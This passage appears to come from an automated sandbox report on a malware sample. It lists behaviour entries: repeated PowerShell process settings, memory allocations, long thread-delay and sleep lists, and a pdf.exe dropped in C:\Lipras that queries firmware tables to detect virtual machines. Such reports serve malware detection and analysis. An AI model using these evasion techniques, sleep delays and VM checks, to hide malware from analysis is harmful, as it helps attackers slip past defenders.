Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Lipras\pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Lipras\pdf.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 9B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4300000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598574	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596492	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596388	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596280	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595076	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 1829	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 8004	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7825	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1868	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5956	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3819	Jump to behavior
Source: C:\Lipras\pdf.exe	Window / User API: threadDelayed 1154	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598574s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596492s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596388s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -595076s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -594859s >= -30000s	Jump to behavior
